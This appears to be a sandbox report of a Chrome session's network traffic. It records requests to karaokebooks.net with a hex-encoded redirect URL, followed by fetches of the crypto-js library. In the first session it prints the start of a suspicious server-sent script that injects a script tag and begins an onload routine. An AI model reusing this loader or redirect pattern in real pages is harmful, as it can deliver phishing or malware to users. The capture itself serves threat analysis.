                                                                                                                                                                                                                                                                            Dec 3, 2024 19:01:47.082206964 CET1.1.1.1192.168.2.40x7380No error (0)teams.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            0192.168.2.44973669.49.245.1724431420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:58:39 UTC653OUTGET /res444.php?2-68747470733a2f2f6a394c672e786279686971626a6c2e636f6d2f61646d692f-oakwood HTTP/1.1
                                                                                                                                                                                                                                                                            Host: karaokebooks.net
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                            2024-12-03 17:58:40 UTC196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:58:38 GMT
                                                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                            Content-Type: text/javascript;charset=UTF-8
                                                                                                                                                                                                                                                                            2024-12-03 17:58:40 UTC1973INData Raw: 37 61 39 0d 0a 20 20 20 20 76 61 72 20 73 4d 42 63 63 6d 51 6b 62 6d 77 43 61 7a 4d 46 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 73 4d 42 63 63 6d 51 6b 62 6d 77 43 61 7a 4d 46 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 29 3b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 28 73 4d 42 63 63 6d 51 6b 62 6d 77 43 61 7a 4d 46 29 3b 0d 0a 73 4d 42 63 63 6d 51 6b 62 6d 77 43 61 7a 4d 46 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                                                                                                                                                                                            Data Ascii: 7a9 var sMBccmQkbmwCazMF = document.createElement("script");sMBccmQkbmwCazMF.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(sMBccmQkbmwCazMF);sMBccmQkbmwCazMF.onload=function()


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            1192.168.2.449737104.17.25.144431420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:58:41 UTC526OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                                                                                                                                                                                                                                                            Host: cdnjs.cloudflare.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                            2024-12-03 17:58:41 UTC962INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:58:41 GMT
                                                                                                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=30672000
                                                                                                                                                                                                                                                                            ETag: W/"5eb03e2d-bb78"
                                                                                                                                                                                                                                                                            Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                                                                                                                                                                                                                                            cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                            Age: 172885
                                                                                                                                                                                                                                                                            Expires: Sun, 23 Nov 2025 17:58:41 GMT
                                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ev0sG%2BvWoXgkZoytEC8Ygm124wRmE1DWyvNOppsopukUbvEPwDFDqInM6NF908TDceOEUVy7D%2FsWfDwvInPXJGcgFQdBLdJF3ZX%2BhDrl7%2FjpdfcPH4Nq%2Fw99auHb7od70B598Cd9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                            NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                            CF-RAY: 8ec5723f0df29e1a-EWR
                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                            2024-12-03 17:58:41 UTC407INData Raw: 37 62 65 66 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                                                                                                                                                                                                                                                            Data Ascii: 7bef!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
                                                                                                                                                                                                                                                                            2024-12-03 17:58:41 UTC1369INData Raw: 26 28 74 3d 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70
                                                                                                                                                                                                                                                                            Data Ascii: &(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typ
                                                                                                                                                                                                                                                                            2024-12-03 17:58:41 UTC1369INData Raw: 20 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 2b 29 7b 76 61 72 20 73 3d 72 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a 66 75
                                                                                                                                                                                                                                                                            Data Ascii: o=0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:fu
                                                                                                                                                                                                                                                                            2024-12-03 17:58:41 UTC1369INData Raw: 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72
                                                                                                                                                                                                                                                                            Data Ascii: se(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._doPr
                                                                                                                                                                                                                                                                            2024-12-03 17:58:41 UTC1369INData Raw: 35 35 3d 3d 3d 69 3f 69 3d 30 3a 2b 2b 69 29 3a 2b 2b 72 29 3a 2b 2b 65 2c 74 3d 30 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d 3e 3e
                                                                                                                                                                                                                                                                            Data Ascii: 55===i?i=0:++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]>>
                                                                                                                                                                                                                                                                            2024-12-03 17:58:41 UTC1369INData Raw: 32 2b 28 65 5b 34 5d 3e 3e 3e 30 3c 77 74 5b 34 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69
                                                                                                                                                                                                                                                                            Data Ascii: 2+(e[4]>>>0<wt[4]>>>0?1:0)|0,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((n*n>>>17)+n*o>>>15)+o*o,c=((4294901760&i)*i
                                                                                                                                                                                                                                                                            2024-12-03 17:58:41 UTC1369INData Raw: 3e 36 2d 6f 25 34 2a 32 2c 61 3d 73 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32 39 34
                                                                                                                                                                                                                                                                            Data Ascii: >6-o%4*2,a=s|c;i[n>>>2]|=a<<24-n%4*8,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=4294
                                                                                                                                                                                                                                                                            2024-12-03 17:58:41 UTC1369INData Raw: 53 3d 41 28 53 2c 6d 2c 78 2c 62 2c 42 2c 35 2c 48 5b 32 38 5d 29 2c 62 3d 41 28 62 2c 53 2c 6d 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b 33 38
                                                                                                                                                                                                                                                                            Data Ascii: S=A(S,m,x,b,B,5,H[28]),b=A(b,S,m,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,H[38
                                                                                                                                                                                                                                                                            2024-12-03 17:58:41 UTC1369INData Raw: 63 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28
                                                                                                                                                                                                                                                                            Data Ascii: clone.call(this);return t._hash=this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r|~e&i)+n+s;return(c<<o|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i|r&~i)+n+s;return(c<<o|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;return(
                                                                                                                                                                                                                                                                            2024-12-03 17:58:41 UTC1369INData Raw: 29 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72 2c 2e
                                                                                                                                                                                                                                                                            Data Ascii: ),function(n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r,.


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            2192.168.2.449741104.17.24.144431420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-03 17:58:43 UTC386OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                                                                                                                                                                                                                                                            Host: cdnjs.cloudflare.com
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                            2024-12-03 17:58:44 UTC960INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Tue, 03 Dec 2024 17:58:43 GMT
                                                                                                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=30672000
                                                                                                                                                                                                                                                                            ETag: W/"5eb03e2d-bb78"
                                                                                                                                                                                                                                                                            Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                                                                                                                                                                                                                                            cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                            Age: 172887
                                                                                                                                                                                                                                                                            Expires: Sun, 23 Nov 2025 17:58:43 GMT
                                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S8Ac7INuAZ%2FRYtc13fca5Ks0TCKV3pf9tryOJKPkDO5yEcKXn%2FHfjRwkvIeK4FUlBk54%2FxyBxf5SFGT4nZXjBPpAR4GEEUuY1UfMqb3RqP5q12NJ%2BE78r5shK9oanVRL3hDMTCFS"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                            NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=15780000
                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                            CF-RAY: 8ec5724c497a2365-EWR
                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                            2024-12-03 17:58:44 UTC409INData Raw: 37 62 66 31 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                                                                                                                                                                                                                                                            Data Ascii: 7bf1!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
